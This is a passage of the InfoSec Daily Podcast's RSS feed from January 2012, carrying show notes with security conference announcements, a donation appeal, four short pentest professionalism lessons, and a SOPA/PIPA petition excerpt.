Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 572 for January 19, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, and Adrian Crenshaw.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates (New Update!)
	http://www.social-engineer.org/bradsmithdonation
	CampusCon 2012
	When: January 21, 2012
	Where: MOVED: CampusCon has been moved to the main WIT campus on Browne&#39;s Road
	http://campuscon.hackingwit.com
	New England InfoSec Tweetup
	When: January 21, 2012
	Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH
	http://neistu3.eventbrite.com/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Outerz0ne 8
	When: April 27-29, 2012
	Where: &#160;Atlanta, GA 
	http://www.outerz0ne.org/OZ8/
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;The Reunion&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.networkworld.com/[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 571 &#8211; Pentest Lessons, Apache/Tomcat Hash Attack, Muscovite, Bank Remote Access, Attacking the Exchanges &amp; Cost of Shutdown</title>
		<link>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown</link>
		<comments>http://www.isdpodcast.com/episode-571-pentest-lessons-apachetomcat-hash-attack-muscovite-bank-remote-access-attacking-the-exchanges-cost-of-shutdown#comments</comments>
		<pubDate>Thu, 19 Jan 2012 01:48:03 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3392</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 571 for January 18, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &#38; Geordy Rostad. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 571 for January 18, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan &amp; Geordy Rostad.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CampusCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland</span><br />
	<a href="http://campuscon.hackingwit.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://campuscon.hackingwit.com</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">(from Baconzombie)</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New England InfoSec Tweetup</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 21, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Ledgewood Hills Clubhouse &#8211; Nashua, NH</span><br />
	<a href="http://neistu3.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://neistu3.eventbrite.com/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<a href="http://shmooconepilogue.eventbrite.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://shmooconepilogue.eventbrite.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">BSides Chicago<br class="kix-line-break" /><br />
	</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th, 2012<br class="kix-line-break" /><br />
	Where: Volcano Room (further info coming)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cost: Free (as always!) &#8211; Registration opening soon!</span><br />
	<a href="http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.securitybsides.com/w/page/48444703/BSidesChicago-2012</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">They&rsquo;re looking for sponsors, so if you know someone, pass it on.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Pentest Lessons:</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Adam Compton &amp; Zac Wagle&#39;s should get credit for the &quot;Pentest Lessons&quot; idea. They also started a twitter account:</span><a href="https://twitter.com/pentestlessons"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://twitter.com/pentestlessons</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Don&rsquo;t assume that your client has any idea what you do. &nbsp;Don&rsquo;t assume they aren&rsquo;t interested in hearing about it though. &nbsp;Every time you are talking to the customer, you are representing the company. &nbsp;Educating the client is a great way to build business relationships.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Stay within your scope: if you&#39;ve been hired to audit or test &#8211; don&#39;t fix anything.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In my reckless youth I popped a box that had a virus on it. &nbsp;I thought I&#39;d be a superhero and remove the virus so I could laugh about it during my report presentation. &nbsp;Instead the machine locked up, and 300 Kilometres away I could FEEL it&#39;s blue screen. Yeah, it was the company&#39;s payroll server.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> &nbsp;Depending on your engagement agreement, if you fuck up something really important (like a payroll system), don&#39;t wait long before reporting it.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> If you are doing an audit which consists mostly of interviews, actually perform the interview. Don&rsquo;t go into tangents and stories. It is an interview after all. Ask them to explain their job functions, what they do on a day to day basis, and what types of challenges they run in to. #SoShowMeOrFuckYou</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://blog.demandprogress.org/mission/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.demandprogress.org/mission/</span></a></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Today has been amazing, but there&#39;s one thing that could completely stop SOPA and PIPA in their tracks: </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">President Obama has expressed concerns about the bills, but hasn&#39;t pledged to veto them.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please click </span><a href="http://act.demandprogress.org/sign/protectip_docs"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">here</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> to urge President Obama to promise to veto SOPA and PIPA.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">There&#39;s enough opposition to these bills now that even if they pass, they won&#39;t be able to overcome a veto. &nbsp;&nbsp;A promise to veto the bills will force opponents into a full retreat, and be the perfect way to cap off this week&#39;s protests</span></p>
